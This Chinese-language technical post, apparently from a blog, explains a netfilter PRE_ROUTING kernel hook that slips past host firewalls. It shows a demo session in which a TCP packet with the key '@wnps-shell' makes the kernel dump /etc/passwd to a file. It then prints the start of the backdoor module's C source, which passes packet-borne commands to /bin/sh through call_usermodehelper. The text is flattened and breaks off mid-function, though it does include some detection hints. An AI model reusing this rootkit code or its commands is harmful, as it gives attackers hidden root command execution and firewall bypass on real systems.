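1、利用 netfilter 来突破防火墙

前几天看了 rwrk 这个 rk 的 demo,它就是利用 netfilter hook 住了进入主机的数据包,hook 点是 NF_IP_PRE_ROUTING,因此可以在数据包进入 iptables 之前提前实现过滤(主机防火墙的过滤规则通常挂在其后的 INPUT 链上)。在这个 hook 点上可以做的文章比较多:可以实现防火墙、嗅探器,当然也可以用来触发回连后门,wnps 就是这么做的,因此不管主机防火墙的规则写得如何变态,都有机会穿透它。需要说明的是,这类 hook 以内核模块的形式加载,前提是已经取得 root 权限,所以它属于入侵之后的隐蔽后门手段,而不是获取初始访问的方法;排查时应关注来历不明的内核模块,以及内核日志中的异常输出(下面的 demo 在调试模式下会通过 printk 留下 "hook:function:" 开头的记录)。

下面这个 demo 用来演示分析 tcp 包的内容,分析出里面的命令,然后去执行它,有点类似以前的 icmp、ip 包后门,只不过这些都在内核中完成,功能更强大。demo 在 ubuntu 8.10 + 2.6.28 上测试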
2、成功。wzt@wzt-laptop:~$nc-vvlocalhost22localhost[127.0.0.1]22(ssh)openSSH-2.0-OpenSSH_5.1p1Debian-3ubuntu1@wnps-shell:cat/etc/passwd>/home/wzt/pass.logProtocolmismatch.sent49,rcvd58demsg:[957.255416]kexecteststart...[1029.692964]hook:function:hook_func-L125:gotthetcpkey.[1029.692981]hook:function:hook
3、_func-L127:cat/etc/passwd>/home/wzt/pass.log[1029.692985]wzt@wzt-laptop:~$ls-lhtpass.log-rw-r--r--1rootroot1.7K2009-06-0408:08pass.log+---------------------------------------------------------------------+#include#include#include#include4、>#include#include#include#include#include#include#include#include#include#include#include#include#include5、tfilter_ipv4.h>#include#include#include#include#defineHOOK_DEBUG#ifdefHOOK_DEBUG#defineDbgPrint(format,args...)printk("hook:function:%s-L%d:"format,__FUNCTION__,__LINE__,##args);#else#defineDbgPrint(format,args...)do{}while(0);#endif#defineTCP6、_SHELL_KEY"@wnps-shell"#definePORT_NUM6#defineIP_NUM20#defineBUFF_NUM512MODULE_LICENSE("GPL");MODULE_AUTHOR("wzt");structexec_work{structwork_structwork;char*cmd;};staticstructnf_hook_opsnfho;intkexec_user_app(void*data){structexec_work*work=data;intret;char*argv[]={"/bin/sh","-c",work->cmd,NULL};c7、har*envp[]={"HOME=/","TERM=linux","PATH=/sbin:/usr/sbin:/bin:/usr/bin",NULL};ret=call_usermodehelper(argv[0],argv,envp,1);returnret;}intexecute_user_command(char*cmd){structexec_work*exec_work;exec_work=kma